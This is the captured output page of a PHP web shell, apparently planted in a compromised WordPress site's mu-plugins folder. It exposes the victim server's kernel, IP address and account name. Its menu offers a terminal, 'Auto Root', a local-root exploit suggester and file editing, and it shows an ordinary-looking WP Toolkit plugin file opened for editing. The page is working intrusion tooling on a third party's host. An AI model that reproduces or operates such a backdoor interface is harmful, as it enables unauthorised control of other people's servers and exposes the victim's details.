Linux yavrix.internet-webhosting.com 3.10.0-962.3.2.lve1.5.88.el7.x86_64 #1 SMP Fri Sep 26 14:06:42 UTC 2025 x86_64
LiteSpeed
Server IP : 103.8.25.136 & Your IP : 216.73.216.189
Domains :
Cant Read [ /etc/named.conf ]
User : klinikpe
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
klinikpe /
public_html /
wp-content /
mu-plugins /
Delete
Unzip
Name
Size
Permission
Date
Action
wp-toolkit
[ DIR ]
drwxr-xr-x
2026-08-06 02:24
.htaccess
237
B
-r-xr-xr-x
2026-08-07 01:42
hostinger-cache.php
52.25
KB
-rw-r--r--
2026-04-10 23:37
wp-toolkit.php
1.19
KB
-rw-r--r--
2023-11-19 18:32
Save
Rename
<?php // Copyright 1999-2026. WebPros International GmbH. All rights reserved. /* * Plugin Name: WP Toolkit plugin * Plugin URI: https://www.plesk.com/wp-toolkit/ * Description: WP Toolkit plugin is installed by WP Toolkit or WP Guardian to provide functionality that can only work within WordPress itself * Version: 6.11.0-10579 * Requires at least: 4.0 * Requires PHP: 5.6 */ // Do not access this file directly if (!\defined('ABSPATH')) { header('Content-Type: text/plain'); die(<<<MSG _________ < Go away > --------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || MSG ); } $phpVersion = phpversion(); if ($phpVersion === false || version_compare($phpVersion, '5.6', '<')) { return; } // wp_get_wp_version return an unmodified WordPress version and is available since WordPress 6.7.0 if (\function_exists('wp_get_wp_version')) { $currentWpVersion = wp_get_wp_version(); } else { $currentWpVersion = $GLOBALS['wp_version']; } if (!\is_null($currentWpVersion) && version_compare($currentWpVersion, '4.0', '>=')) { require_once __DIR__ . '/wp-toolkit/bootstrap.php'; }